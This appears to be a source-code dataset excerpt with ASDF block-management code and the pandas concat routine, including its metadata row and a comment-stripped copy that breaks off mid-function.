int(x) for x in ctx.version_map['YAML_VERSION'].split('.'))
yaml.dump(
offsets, Dumper=yamlutil._yaml_base_dumper, stream=fd,
explicit_start=True, explicit_end=True,
version=yaml_version,
allow_unicode=True, encoding='utf-8')
_re_index_content = re.compile(
b'^' + constants.INDEX_HEADER + b'\r?\n%YAML.*\.\.\.\r?\n?$')
_re_index_misc = re.compile(b'^[\n\r\x20-\x7f]+$')
def read_block_index(self, fd, ctx):
# everything can still be read from the file, only slower.
# Importantly, it must remain "transactionally clean", and not
# create any blocks until we're sure the block index makes
if not fd.seekable():
return
if not len(self._internal_blocks):
return
first_block = self._internal_blocks[0]
first_block_end = first_block.end_offset
fd.seek(0, generic_io.SEEK_END)
file_size = block_end = fd.tell()
block_start = ((block_end - 5) // fd.block_size) * fd.block_size
buff_size = block_end - block_start
content = b''
fd.seek(block_start, generic_io.SEEK_SET)
buff = fd.read(buff_size)
buff = buff.rstrip(b'\0')
content = buff
# block index
for ending in (b'...', b'...\r\n', b'...\n'):
if content.endswith(ending):
break
else:
return
# Read blocks in reverse order from the end of the file
while True:
# Look for the index header
idx = content.find(constants.INDEX_HEADER)
if idx != -1:
content = content[idx:]
index_start = block_start + idx
break
else:
# If the rest of it starts to look like binary
# values, bail...
if not self._re_index_misc.match(buff):
return
if block_start <= first_block_end:
return
block_end = block_start
block_start = max(block_end - fd.block_size, first_block_end)
fd.seek(block_start, generic_io.SEEK_SET)
buff_size = block_end - block_start
buff = fd.read(buff_size)
content = buff + content
yaml_content = content[content.find(b'\n') + 1:]
offsets = yaml.load(yaml_content,
Loader=yamlutil._yaml_base_loader)
# Make sure the indices look sane
if not isinstance(offsets, list) or len(offsets) == 0:
return
last_offset = 0
for x in offsets:
if (not isinstance(x, six.integer_types) or
x > file_size or
x < 0 or
x <= last_offset + Block._header.size):
return
last_offset = x
# We always read the first block, so we can confirm that the
# first entry in the block index matches the first block
if offsets[0] != first_block.offset:
return
if len(offsets) == 1:
# If there's only one block in the index, we've already
# loaded the first block, so just return: we have nothing
# left to do
return
# One last sanity check: Read the last block in the index and
# make sure it makes sense.
fd.seek(offsets[-1], generic_io.SEEK_SET)
try:
block = Block().read(fd)
except (ValueError, IOError):
return
# Now see if the end of the last block leads right into the index
if (block.end_offset != index_start):
return
# It seems we're good to go, so instantiate the UnloadedBlock
for offset in offsets[1:-1]:
self._internal_blocks.append(UnloadedBlock(fd, offset))
self._internal_blocks.append(block)
def get_external_filename(self, filename, index):
filename = os.path.splitext(filename)[0]
return filename + '{0:04d}.asdf'.format(index)
def get_external_uri(self, uri, index):
if uri is None:
uri = ''
parts = list(urlparse.urlparse(uri))
path = parts[2]
dirname, filename = os.path.split(path)
filename = self.get_external_filename(filename, index)
path = os.path.join(dirname, filename)
parts[2] = path
return urlparse.urlunparse(parts)
def _find_used_blocks(self, tree, ctx):
reserved_blocks = set()
for node in treeutil.iter_tree(tree):
hook = ctx.type_index.get_hook_for_type(
'reserve_blocks', type(node), ctx.version_string)
if hook is not None:
for block in hook(node, ctx):
reserved_blocks.add(block)
for block in list(self.blocks):
if (getattr(block, '_used', 0) == 0 and
block not in reserved_blocks):
self.remove(block)
def _handle_global_block_settings(self, ctx, block):
all_array_storage = getattr(ctx, '_all_array_storage', None)
if all_array_storage:
self.set_array_storage(block, all_array_storage)
all_array_compression = getattr(ctx, '_all_array_compression', None)
if all_array_compression:
block.compression = all_array_compression
auto_inline = getattr(ctx, '_auto_inline', None)
if auto_inline:
if np.product(block.data.shape) < auto_inline:
self.set_array_storage(block, 'inline')
def finalize(self, ctx):
# isn't) afterword?
self._find_used_blocks(ctx.tree, ctx)
for block in list(self.blocks):
self._handle_global_block_settings(ctx, block)
def get_block(self, source):
if isinstance(source, six.integer_types):
if source == -1:
if len(self._streamed_blocks):
return self._streamed_blocks[0]
# we can read all of the blocks, ultimately arriving
# at the last one, which, if all goes well is a
# streamed block.
# First, look in the blocks we've already read
elif source >= 0:
if source < len(self._internal_blocks):
return self._internal_blocks[source]
else:
raise ValueError("Invalid source id {0}".format(source))
# new blocks.
if len(self._streamed_blocks) or len(self._internal_blocks) == 0:
raise ValueError("Block '{0}' not found.".format(source))
# If the desired block hasn't already been read, and the
last_block = self._internal_blocks[-1]
if (last_block._fd is not None and
last_block._fd.seekable()):
last_block._fd.seek(last_block.end_offset)
while True:
next_block = self._read_next_internal_block(
last_block._fd, False)
if next_block is None:
break
if len(self._internal_blocks) - 1 == source:
return next_block
last_block = next_block
if (source == -1 and
last_block.array_storage == 'streamed'):
return last_block
raise ValueError("Block '{0}' not found.".format(source))
elif isinstance(source, six.string_types):
asdffile = self._asdffile().open_external(
source, do_not_fill_defaults=True)
block = asdffile.blocks._internal_blocks[0]
self.set_array_storage(block, 'external')
else:
raise TypeError("Unknown source '{0}'".format(source))
return block
def get_source(self, block):
for i, internal_block in enumerate(self.internal_blocks):
if block == internal_block:
if internal_block.array_storage == 'streamed':
return -1
return i
for i, external_block in enumerate(self.external_blocks):
if block == external_block:
if self._asdffile().uri is None:
raise ValueError(
"Can't write external blocks, since URI of main file is "
"unknown.")
parts = list(urlparse.urlparse(self._asdffile().uri))
path = parts[2]
filename = os.path.basename(path)
return self.get_external_filename(filename, i)
raise ValueError("block not found.")
def find_or_create_block_for_array(self, arr, ctx):
from .tags.core import ndarray
if (isinstance(arr, ndarray.NDArrayType) and
arr.block is not None):
if arr.block in self.blocks:
return arr.block
else:
arr._block = None
base = util.get_array_base(arr)
block = self._data_to_block_mapping.get(id(base))
if block is not None:
return block
block = Block(base)
self.add(block)
self._handle_global_block_settings(ctx, block)
return block
def get_streamed_block(self):
block = self.streamed_block
if block is None:
block = Block(array_storage='streamed')
self.add(block)
return block
def add_inline(self, array):
block = Block(array, array_storage='inline')
self.add(block)
return block
def __getitem__(self, arr):
return self.find_or_create_block_for_array(arr, object())
def close(self):
for block in self.blocks:
block.close()
class Block(object):
_header = util.BinaryStruct([
('flags', 'I'),
('compression', '4s'),
('allocated_size', 'Q'),
('used_size', 'Q'),
('data_size', 'Q'),
('checksum', '16s')
])
def __init__(self, data=None, uri=None, array_storage='internal'):
self._data = data
self._uri = uri
self._array_storage = array_storage
self._fd = None
self._offset = None
self._compression = None
self._checksum = None
self._memmapped = False
self.update_size()
self._allocated = self._size
def __repr__(self):
return '<Block {0} off: {1} alc: {2} siz: {3}>'.format(
self._array_storage[:3], self._offset, self._allocated,
self._size)
def __len__(self):
return self._size
@property
def offset(self):
return self._offset
@offset.setter
def offset(self, offset):
self._offset = offset
@property
def allocated(self):
return self._allocated
@allocated.setter
def allocated(self, allocated):
self._allocated = allocated
@property
def header_size(self):
return self._header.size + constants.BLOCK_HEADER_BOILERPLATE_SIZE
@property
def data_offset(self):
return self._offset + self.header_size
@property
def size(self):
return self._size + self.header_size
@property
def end_offset(self):
return self.offset + self.header_size + self.allocated
def override_byteorder(self, byteorder):
return byteorder
@property
def array_storage(self):
return self._array_storage
@property
def compression(self):
return self._compression
@compression.setter
def compression(self, compression):
self._compression = mcompression.validate(compression)
@property
def is_compressed(self):
return self._compression is not None
@property
def checksum(self):
return self._checksum
def _set_checksum(self, checksum):
if checksum == b'\0' * 16:
self._checksum = None
else:
self._checksum = checksum
def _calculate_checksum(self, data):
m = hashlib.new('md5')
m.update(self.data)
return m.digest()
def validate_checksum(self):
if self._checksum:
checksum = self._calculate_checksum(self.data)
if checksum != self._checksum:
return False
return True
def update_checksum(self):
self._checksum = self._calculate_checksum(self.data)
def update_size(self):
if self._data is not None:
if six.PY2:
self._data_size = len(self._data.data)
else:
self._data_size = self._data.data.nbytes
if not self.is_compressed:
self._size = self._data_size
else:
self._size = mcompression.get_compressed_size(
self._data, self.compression)
else:
self._data_size = self._size = 0
def read(self, fd, past_magic=False, validate_checksum=False):
offset = None
if fd.seekable():
offset = fd.tell()
if not past_magic:
buff = fd.read(len(constants.BLOCK_MAGIC))
if len(buff) < 4:
return None
if buff not in (constants.BLOCK_MAGIC,
constants.INDEX_HEADER[:len(buff)]):
raise ValueError(
"Bad magic number in block. "
"This may indicate an internal inconsistency about the "
"sizes of the blocks in the file.")
if buff == constants.INDEX_HEADER[:len(buff)]:
return None
elif offset is not None:
offset -= 4
buff = fd.read(2)
header_size, = struct.unpack(b'>H', buff)
if header_size < self._header.size:
raise ValueError(
"Header size must be >= {0}".format(self._header.size))
buff = fd.read(header_size)
header = self._header.unpack(buff)
# This is used by the documentation system, but nowhere else.
self._flags = header['flags']
self.compression = header['compression']
self._set_checksum(header['checksum'])
if (self.compression is None and
header['used_size'] != header['data_size']):
raise ValueError(
"used_size and data_size must be equal when no compression is used.")
if (header['flags'] & constants.BLOCK_FLAG_STREAMED and
self.compression is not None):
raise ValueError(
"Compression set on a streamed block.")
if fd.seekable():
# If the file is seekable, we can delay reading the actual
# data until later.
self._fd = fd
self._header_size = header_size
self._offset = offset
if header['flags'] & constants.BLOCK_FLAG_STREAMED:
# Support streaming blocks
fd.fast_forward(-1)
self._array_storage = 'streamed'
self._data_size = self._size = self._allocated = \
(fd.tell() - self.data_offset) + 1
else:
fd.fast_forward(header['allocated_size'])
self._allocated = header['allocated_size']
self._size = header['used_size']
self._data_size = header['data_size']
else:
# If the file is a stream, we need to get the data now.
if header['flags'] & constants.BLOCK_FLAG_STREAMED:
# Support streaming blocks
self._array_storage = 'streamed'
self._data = fd.read_into_array(-1)
self._data_size = self._size = self._allocated = len(self._data)
else:
self._data_size = header['data_size']
self._size = header['used_size']
self._allocated = header['allocated_size']
self._data = self._read_data(
fd, self._size, self._data_size, self.compression)
fd.fast_forward(self._allocated - self._size)
fd.close()
if validate_checksum and not self.validate_checksum():
raise ValueError(
"Block at {0} does not match given checksum".format(
self._offset))
return self
def _read_data(self, fd, used_size, data_size, compression):
if not compression:
return fd.read_into_array(used_size)
else:
return mcompression.decompress(
fd, used_size, data_size, compression)
def write(self, fd):
self._header_size = self._header.size
flags = 0
data_size = used_size = allocated_size = 0
if self._array_storage == 'streamed':
flags |= constants.BLOCK_FLAG_STREAMED
elif self._data is not None:
self.update_checksum()
if not fd.seekable() and self.is_compressed:
buff = io.BytesIO()
mcompression.compress(buff, self._data, self.compression)
self.allocated = self._size = buff.tell()
data_size = self._data.nbytes
allocated_size = self.allocated
used_size = self._size
if self.checksum is not None:
checksum = self.checksum
else:
checksum = b'\0' * 16
fd.write(constants.BLOCK_MAGIC)
fd.write(struct.pack(b'>H', self._header_size))
fd.write(self._header.pack(
flags=flags,
compression=mcompression.to_compression_header(
self.compression),
allocated_size=allocated_size,
used_size=used_size, data_size=data_size,
checksum=checksum))
if self._data is not None:
if self.is_compressed:
if not fd.seekable():
fd.write(buff.getvalue())
else:
# If the file is seekable, we write the
# compressed data directly to it, then go back
# and write the resulting size in the block
# header.
start = fd.tell()
mcompression.compress(fd, self._data, self.compression)
end = fd.tell()
self.allocated = self._size = end - start
fd.seek(self.offset + 6)
self._header.update(
fd,
allocated_size=self.allocated,
used_size=self._size)
fd.seek(end)
else:
fd.write_array(self._data)
@property
def data(self):
if self._data is None:
if self._fd.is_closed():
raise IOError(
"ASDF file has already been closed. "
"Can not get the data.")
# Be nice and reset the file position after we're done
curpos = self._fd.tell()
try:
if not self.is_compressed and self._fd.can_memmap():
self._data = self._fd.memmap_array(
self.data_offset, self._size)
self._memmapped = True
else:
self._fd.seek(self.data_offset)
self._data = self._read_data(
self._fd, self._size, self._data_size,
self.compression)
finally:
self._fd.seek(curpos)
return self._data
def close(self):
if self._memmapped and self._data is not None:
if NUMPY_LT_1_7:
try:
self._data.flush()
except ValueError:
pass
else:
self._data.flush()
if self._data._mmap is not None:
self._data._mmap.close()
self._data = None
class UnloadedBlock(object):
def __init__(self, fd, offset):
self._fd = fd
self._offset = offset
self._data = None
self._uri = None
self._array_storage = 'internal'
self._compression = None
self._checksum = None
self._memmapped = False
def __len__(self):
self.load()
return len(self)
def close(self):
pass
@property
def array_storage(self):
return 'internal'
@property
def offset(self):
return self._offset
def __getattr__(self, attr):
self.load()
return getattr(self, attr)
def load(self):
self._fd.seek(self._offset, generic_io.SEEK_SET)
self.__class__ = Block
self.read(self._fd)
def calculate_updated_layout(blocks, tree_size, pad_blocks, block_size):
def unfix_block(i):
entry = fixed[i]
copy = entry.block.data.copy()
entry.block.close()
entry.block._data = copy
del fixed[i]
free.append(entry.block)
def fix_block(block, offset):
block.offset = offset
fixed.append(Entry(block.offset, block.offset + block.size, block))
fixed.sort()
Entry = namedtuple("Entry", ['start', 'end', 'block'])
fixed = []
free = []
for block in blocks._internal_blocks:
if block.offset is not None:
block.update_size()
fixed.append(
Entry(block.offset, block.offset + block.size, block))
else:
free.append(block)
if not len(fixed):
return False
fixed.sort()
while len(fixed) and fixed[0].start < tree_size:
unfix_block(0)
if not len(fixed):
return False
while len(free):
block = free.pop()
last_end = tree_size
for entry in fixed:
if entry.start - last_end >= block.size:
fix_block(block, last_end)
break
last_end = entry.end
else:
padding = util.calculate_padding(
entry.block.size, pad_blocks, block_size)
fix_block(block, last_end + padding)
if blocks.streamed_block is not None:
padding = util.calculate_padding(
fixed[-1].block.size, pad_blocks, block_size)
blocks.streamed_block.offset = fixed[-1].end + padding
blocks._sort_blocks_by_offset()
return True
| true | true |
1c2c97d6680a3f3e3a80c84d1ae03684c0396467 | 22,260 | py | Python | pandas/core/reshape/concat.py | kpflugshaupt/pandas | c9e3883c630c48b17218e6bcc5593720c1402bf1 | [
"BSD-3-Clause"
] | 2 | 2021-04-07T13:56:06.000Z | 2021-04-12T13:45:23.000Z | pandas/core/reshape/concat.py | sanjusci/pandas | a1fee9199eba7ebf423880243936b9f1501d3d3a | [
"BSD-3-Clause"
] | null | null | null | pandas/core/reshape/concat.py | sanjusci/pandas | a1fee9199eba7ebf423880243936b9f1501d3d3a | [
"BSD-3-Clause"
] | 3 | 2018-01-08T08:40:55.000Z | 2019-10-07T02:02:40.000Z | """
concat routines
"""
import numpy as np
import pandas.core.dtypes.concat as _concat
from pandas import DataFrame, Index, MultiIndex, Series, compat
from pandas.core import common as com
from pandas.core.arrays.categorical import (
_factorize_from_iterable, _factorize_from_iterables)
from pandas.core.generic import NDFrame
from pandas.core.index import (
_all_indexes_same, _get_consensus_names, _get_objs_combined_axis,
ensure_index)
import pandas.core.indexes.base as ibase
from pandas.core.internals import concatenate_block_managers
# ---------------------------------------------------------------------
# Concatenate DataFrame objects
def concat(objs, axis=0, join='outer', join_axes=None, ignore_index=False,
keys=None, levels=None, names=None, verify_integrity=False,
sort=None, copy=True):
"""
Concatenate pandas objects along a particular axis with optional set logic
along the other axes.
Can also add a layer of hierarchical indexing on the concatenation axis,
which may be useful if the labels are the same (or overlapping) on
the passed axis number.
Parameters
----------
objs : a sequence or mapping of Series, DataFrame, or Panel objects
If a dict is passed, the sorted keys will be used as the `keys`
argument, unless it is passed, in which case the values will be
selected (see below). Any None objects will be dropped silently unless
they are all None in which case a ValueError will be raised.
axis : {0/'index', 1/'columns'}, default 0
The axis to concatenate along.
join : {'inner', 'outer'}, default 'outer'
How to handle indexes on other axis (or axes).
join_axes : list of Index objects
Specific indexes to use for the other n - 1 axes instead of performing
inner/outer set logic.
ignore_index : bool, default False
If True, do not use the index values along the concatenation axis. The
resulting axis will be labeled 0, ..., n - 1. This is useful if you are
concatenating objects where the concatenation axis does not have
meaningful indexing information. Note the index values on the other
axes are still respected in the join.
keys : sequence, default None
If multiple levels passed, should contain tuples. Construct
hierarchical index using the passed keys as the outermost level.
levels : list of sequences, default None
Specific levels (unique values) to use for constructing a
MultiIndex. Otherwise they will be inferred from the keys.
names : list, default None
Names for the levels in the resulting hierarchical index.
verify_integrity : bool, default False
Check whether the new concatenated axis contains duplicates. This can
be very expensive relative to the actual data concatenation.
sort : bool, default None
Sort non-concatenation axis if it is not already aligned when `join`
is 'outer'. The current default of sorting is deprecated and will
change to not-sorting in a future version of pandas.
Explicitly pass ``sort=True`` to silence the warning and sort.
Explicitly pass ``sort=False`` to silence the warning and not sort.
This has no effect when ``join='inner'``, which already preserves
the order of the non-concatenation axis.
.. versionadded:: 0.23.0
copy : bool, default True
If False, do not copy data unnecessarily.
Returns
-------
object, type of objs
When concatenating all ``Series`` along the index (axis=0), a
``Series`` is returned. When ``objs`` contains at least one
``DataFrame``, a ``DataFrame`` is returned. When concatenating along
the columns (axis=1), a ``DataFrame`` is returned.
See Also
--------
Series.append : Concatenate Series.
DataFrame.append : Concatenate DataFrames.
DataFrame.join : Join DataFrames using indexes.
DataFrame.merge : Merge DataFrames by indexes or columns.
Notes
-----
The keys, levels, and names arguments are all optional.
A walkthrough of how this method fits in with other tools for combining
pandas objects can be found `here
<http://pandas.pydata.org/pandas-docs/stable/merging.html>`__.
Examples
--------
Combine two ``Series``.
>>> s1 = pd.Series(['a', 'b'])
>>> s2 = pd.Series(['c', 'd'])
>>> pd.concat([s1, s2])
0 a
1 b
0 c
1 d
dtype: object
Clear the existing index and reset it in the result
by setting the ``ignore_index`` option to ``True``.
>>> pd.concat([s1, s2], ignore_index=True)
0 a
1 b
2 c
3 d
dtype: object
Add a hierarchical index at the outermost level of
the data with the ``keys`` option.
>>> pd.concat([s1, s2], keys=['s1', 's2'])
s1 0 a
1 b
s2 0 c
1 d
dtype: object
Label the index keys you create with the ``names`` option.
>>> pd.concat([s1, s2], keys=['s1', 's2'],
... names=['Series name', 'Row ID'])
Series name Row ID
s1 0 a
1 b
s2 0 c
1 d
dtype: object
Combine two ``DataFrame`` objects with identical columns.
>>> df1 = pd.DataFrame([['a', 1], ['b', 2]],
... columns=['letter', 'number'])
>>> df1
letter number
0 a 1
1 b 2
>>> df2 = pd.DataFrame([['c', 3], ['d', 4]],
... columns=['letter', 'number'])
>>> df2
letter number
0 c 3
1 d 4
>>> pd.concat([df1, df2])
letter number
0 a 1
1 b 2
0 c 3
1 d 4
Combine ``DataFrame`` objects with overlapping columns
and return everything. Columns outside the intersection will
be filled with ``NaN`` values.
>>> df3 = pd.DataFrame([['c', 3, 'cat'], ['d', 4, 'dog']],
... columns=['letter', 'number', 'animal'])
>>> df3
letter number animal
0 c 3 cat
1 d 4 dog
>>> pd.concat([df1, df3], sort=False)
letter number animal
0 a 1 NaN
1 b 2 NaN
0 c 3 cat
1 d 4 dog
Combine ``DataFrame`` objects with overlapping columns
and return only those that are shared by passing ``inner`` to
the ``join`` keyword argument.
>>> pd.concat([df1, df3], join="inner")
letter number
0 a 1
1 b 2
0 c 3
1 d 4
Combine ``DataFrame`` objects horizontally along the x axis by
passing in ``axis=1``.
>>> df4 = pd.DataFrame([['bird', 'polly'], ['monkey', 'george']],
... columns=['animal', 'name'])
>>> pd.concat([df1, df4], axis=1)
letter number animal name
0 a 1 bird polly
1 b 2 monkey george
Prevent the result from including duplicate index values with the
``verify_integrity`` option.
>>> df5 = pd.DataFrame([1], index=['a'])
>>> df5
0
a 1
>>> df6 = pd.DataFrame([2], index=['a'])
>>> df6
0
a 2
>>> pd.concat([df5, df6], verify_integrity=True)
Traceback (most recent call last):
...
ValueError: Indexes have overlapping values: ['a']
"""
op = _Concatenator(objs, axis=axis, join_axes=join_axes,
ignore_index=ignore_index, join=join,
keys=keys, levels=levels, names=names,
verify_integrity=verify_integrity,
copy=copy, sort=sort)
return op.get_result()
class _Concatenator(object):
"""
Orchestrates a concatenation operation for BlockManagers
"""
def __init__(self, objs, axis=0, join='outer', join_axes=None,
keys=None, levels=None, names=None,
ignore_index=False, verify_integrity=False, copy=True,
sort=False):
if isinstance(objs, (NDFrame, str)):
raise TypeError('first argument must be an iterable of pandas '
'objects, you passed an object of type '
'"{name}"'.format(name=type(objs).__name__))
if join == 'outer':
self.intersect = False
elif join == 'inner':
self.intersect = True
else: # pragma: no cover
raise ValueError('Only can inner (intersect) or outer (union) '
'join the other axis')
if isinstance(objs, dict):
if keys is None:
keys = com.dict_keys_to_ordered_list(objs)
objs = [objs[k] for k in keys]
else:
objs = list(objs)
if len(objs) == 0:
raise ValueError('No objects to concatenate')
if keys is None:
objs = list(com._not_none(*objs))
else:
# #1649
clean_keys = []
clean_objs = []
for k, v in zip(keys, objs):
if v is None:
continue
clean_keys.append(k)
clean_objs.append(v)
objs = clean_objs
name = getattr(keys, 'name', None)
keys = Index(clean_keys, name=name)
if len(objs) == 0:
raise ValueError('All objects passed were None')
# consolidate data & figure out what our result ndim is going to be
ndims = set()
for obj in objs:
if not isinstance(obj, (Series, DataFrame)):
msg = ("cannot concatenate object of type '{}';"
' only Series and DataFrame objs are valid'
.format(type(obj)))
raise TypeError(msg)
# consolidate
obj._consolidate(inplace=True)
ndims.add(obj.ndim)
# get the sample
# want the highest ndim that we have, and must be non-empty
# unless all objs are empty
sample = None
if len(ndims) > 1:
max_ndim = max(ndims)
for obj in objs:
if obj.ndim == max_ndim and np.sum(obj.shape):
sample = obj
break
else:
# filter out the empties if we have not multi-index possibilities
# note to keep empty Series as it affect to result columns / name
non_empties = [obj for obj in objs
if sum(obj.shape) > 0 or isinstance(obj, Series)]
if (len(non_empties) and (keys is None and names is None and
levels is None and
join_axes is None and
not self.intersect)):
objs = non_empties
sample = objs[0]
if sample is None:
sample = objs[0]
self.objs = objs
# Standardize axis parameter to int
if isinstance(sample, Series):
axis = DataFrame._get_axis_number(axis)
else:
axis = sample._get_axis_number(axis)
# Need to flip BlockManager axis in the DataFrame special case
self._is_frame = isinstance(sample, DataFrame)
if self._is_frame:
axis = 1 if axis == 0 else 0
self._is_series = isinstance(sample, Series)
if not 0 <= axis <= sample.ndim:
raise AssertionError("axis must be between 0 and {ndim}, input was"
" {axis}".format(ndim=sample.ndim, axis=axis))
# if we have mixed ndims, then convert to highest ndim
# creating column numbers as needed
if len(ndims) > 1:
current_column = 0
max_ndim = sample.ndim
self.objs, objs = [], self.objs
for obj in objs:
ndim = obj.ndim
if ndim == max_ndim:
pass
elif ndim != max_ndim - 1:
raise ValueError("cannot concatenate unaligned mixed "
"dimensional NDFrame objects")
else:
name = getattr(obj, 'name', None)
if ignore_index or name is None:
name = current_column
current_column += 1
# doing a row-wise concatenation so need everything
# to line up
if self._is_frame and axis == 1:
name = 0
obj = sample._constructor({name: obj})
self.objs.append(obj)
# note: this is the BlockManager axis (since DataFrame is transposed)
self.axis = axis
self.join_axes = join_axes
self.keys = keys
self.names = names or getattr(keys, 'names', None)
self.levels = levels
self.sort = sort
self.ignore_index = ignore_index
self.verify_integrity = verify_integrity
self.copy = copy
self.new_axes = self._get_new_axes()
def get_result(self):
# series only
if self._is_series:
# stack blocks
if self.axis == 0:
name = com.consensus_name_attr(self.objs)
mgr = self.objs[0]._data.concat([x._data for x in self.objs],
self.new_axes)
cons = _concat._get_series_result_type(mgr, self.objs)
return cons(mgr, name=name).__finalize__(self, method='concat')
# combine as columns in a frame
else:
data = dict(zip(range(len(self.objs)), self.objs))
cons = _concat._get_series_result_type(data)
index, columns = self.new_axes
df = cons(data, index=index)
df.columns = columns
return df.__finalize__(self, method='concat')
# combine block managers
else:
mgrs_indexers = []
for obj in self.objs:
mgr = obj._data
indexers = {}
for ax, new_labels in enumerate(self.new_axes):
if ax == self.axis:
# Suppress reindexing on concat axis
continue
obj_labels = mgr.axes[ax]
if not new_labels.equals(obj_labels):
indexers[ax] = obj_labels.reindex(new_labels)[1]
mgrs_indexers.append((obj._data, indexers))
new_data = concatenate_block_managers(
mgrs_indexers, self.new_axes, concat_axis=self.axis,
copy=self.copy)
if not self.copy:
new_data._consolidate_inplace()
cons = _concat._get_frame_result_type(new_data, self.objs)
return (cons._from_axes(new_data, self.new_axes)
.__finalize__(self, method='concat'))
def _get_result_dim(self):
if self._is_series and self.axis == 1:
return 2
else:
return self.objs[0].ndim
def _get_new_axes(self):
ndim = self._get_result_dim()
new_axes = [None] * ndim
if self.join_axes is None:
for i in range(ndim):
if i == self.axis:
continue
new_axes[i] = self._get_comb_axis(i)
else:
if len(self.join_axes) != ndim - 1:
raise AssertionError("length of join_axes must be equal "
"to {length}".format(length=ndim - 1))
# ufff...
indices = compat.lrange(ndim)
indices.remove(self.axis)
for i, ax in zip(indices, self.join_axes):
new_axes[i] = ax
new_axes[self.axis] = self._get_concat_axis()
return new_axes
def _get_comb_axis(self, i):
data_axis = self.objs[0]._get_block_manager_axis(i)
try:
return _get_objs_combined_axis(self.objs, axis=data_axis,
intersect=self.intersect,
sort=self.sort)
except IndexError:
types = [type(x).__name__ for x in self.objs]
raise TypeError("Cannot concatenate list of {types}"
.format(types=types))
def _get_concat_axis(self):
"""
Return index to be used along concatenation axis.
"""
if self._is_series:
if self.axis == 0:
indexes = [x.index for x in self.objs]
elif self.ignore_index:
idx = ibase.default_index(len(self.objs))
return idx
elif self.keys is None:
names = [None] * len(self.objs)
num = 0
has_names = False
for i, x in enumerate(self.objs):
if not isinstance(x, Series):
raise TypeError("Cannot concatenate type 'Series' "
"with object of type {type!r}"
.format(type=type(x).__name__))
if x.name is not None:
names[i] = x.name
has_names = True
else:
names[i] = num
num += 1
if has_names:
return Index(names)
else:
return ibase.default_index(len(self.objs))
else:
return ensure_index(self.keys).set_names(self.names)
else:
indexes = [x._data.axes[self.axis] for x in self.objs]
if self.ignore_index:
idx = ibase.default_index(sum(len(i) for i in indexes))
return idx
if self.keys is None:
concat_axis = _concat_indexes(indexes)
else:
concat_axis = _make_concat_multiindex(indexes, self.keys,
self.levels, self.names)
self._maybe_check_integrity(concat_axis)
return concat_axis
def _maybe_check_integrity(self, concat_index):
if self.verify_integrity:
if not concat_index.is_unique:
overlap = concat_index[concat_index.duplicated()].unique()
raise ValueError('Indexes have overlapping values: '
'{overlap!s}'.format(overlap=overlap))
def _concat_indexes(indexes):
return indexes[0].append(indexes[1:])
def _make_concat_multiindex(indexes, keys, levels=None, names=None):
if ((levels is None and isinstance(keys[0], tuple)) or
(levels is not None and len(levels) > 1)):
zipped = compat.lzip(*keys)
if names is None:
names = [None] * len(zipped)
if levels is None:
_, levels = _factorize_from_iterables(zipped)
else:
levels = [ensure_index(x) for x in levels]
else:
zipped = [keys]
if names is None:
names = [None]
if levels is None:
levels = [ensure_index(keys)]
else:
levels = [ensure_index(x) for x in levels]
if not _all_indexes_same(indexes):
codes_list = []
# things are potentially different sizes, so compute the exact codes
# for each level and pass those to MultiIndex.from_arrays
for hlevel, level in zip(zipped, levels):
to_concat = []
for key, index in zip(hlevel, indexes):
try:
i = level.get_loc(key)
except KeyError:
raise ValueError('Key {key!s} not in level {level!s}'
.format(key=key, level=level))
to_concat.append(np.repeat(i, len(index)))
codes_list.append(np.concatenate(to_concat))
concat_index = _concat_indexes(indexes)
# these go at the end
if isinstance(concat_index, MultiIndex):
levels.extend(concat_index.levels)
codes_list.extend(concat_index.codes)
else:
codes, categories = _factorize_from_iterable(concat_index)
levels.append(categories)
codes_list.append(codes)
if len(names) == len(levels):
names = list(names)
else:
# make sure that all of the passed indices have the same nlevels
if not len({idx.nlevels for idx in indexes}) == 1:
raise AssertionError("Cannot concat indices that do"
" not have the same number of levels")
# also copies
names = names + _get_consensus_names(indexes)
return MultiIndex(levels=levels, codes=codes_list, names=names,
verify_integrity=False)
new_index = indexes[0]
n = len(new_index)
kpieces = len(indexes)
# also copies
new_names = list(names)
new_levels = list(levels)
# construct codes
new_codes = []
# do something a bit more speedy
for hlevel, level in zip(zipped, levels):
hlevel = ensure_index(hlevel)
mapped = level.get_indexer(hlevel)
mask = mapped == -1
if mask.any():
raise ValueError('Values not found in passed level: {hlevel!s}'
.format(hlevel=hlevel[mask]))
new_codes.append(np.repeat(mapped, n))
if isinstance(new_index, MultiIndex):
new_levels.extend(new_index.levels)
new_codes.extend([np.tile(lab, kpieces) for lab in new_index.codes])
else:
new_levels.append(new_index)
new_codes.append(np.tile(np.arange(n), kpieces))
if len(new_names) < len(new_levels):
new_names.extend(new_index.names)
return MultiIndex(levels=new_levels, codes=new_codes, names=new_names,
verify_integrity=False)
| 35 | 79 | 0.545058 |
import numpy as np
import pandas.core.dtypes.concat as _concat
from pandas import DataFrame, Index, MultiIndex, Series, compat
from pandas.core import common as com
from pandas.core.arrays.categorical import (
_factorize_from_iterable, _factorize_from_iterables)
from pandas.core.generic import NDFrame
from pandas.core.index import (
_all_indexes_same, _get_consensus_names, _get_objs_combined_axis,
ensure_index)
import pandas.core.indexes.base as ibase
from pandas.core.internals import concatenate_block_managers
def concat(objs, axis=0, join='outer', join_axes=None, ignore_index=False,
keys=None, levels=None, names=None, verify_integrity=False,
sort=None, copy=True):
op = _Concatenator(objs, axis=axis, join_axes=join_axes,
ignore_index=ignore_index, join=join,
keys=keys, levels=levels, names=names,
verify_integrity=verify_integrity,
copy=copy, sort=sort)
return op.get_result()
class _Concatenator(object):
def __init__(self, objs, axis=0, join='outer', join_axes=None,
keys=None, levels=None, names=None,
ignore_index=False, verify_integrity=False, copy=True,
sort=False):
if isinstance(objs, (NDFrame, str)):
raise TypeError('first argument must be an iterable of pandas '
'objects, you passed an object of type '
'"{name}"'.format(name=type(objs).__name__))
if join == 'outer':
self.intersect = False
elif join == 'inner':
self.intersect = True
else:
raise ValueError('Only can inner (intersect) or outer (union) '
'join the other axis')
if isinstance(objs, dict):
if keys is None:
keys = com.dict_keys_to_ordered_list(objs)
objs = [objs[k] for k in keys]
else:
objs = list(objs)
if len(objs) == 0:
raise ValueError('No objects to concatenate')
if keys is None:
objs = list(com._not_none(*objs))
else:
clean_keys = []
clean_objs = []
for k, v in zip(keys, objs):
if v is None:
continue
clean_keys.append(k)
clean_objs.append(v)
objs = clean_objs
name = getattr(keys, 'name', None)
keys = Index(clean_keys, name=name)
if len(objs) == 0:
raise ValueError('All objects passed were None')
ndims = set()
for obj in objs:
if not isinstance(obj, (Series, DataFrame)):
msg = ("cannot concatenate object of type '{}';"
' only Series and DataFrame objs are valid'
.format(type(obj)))
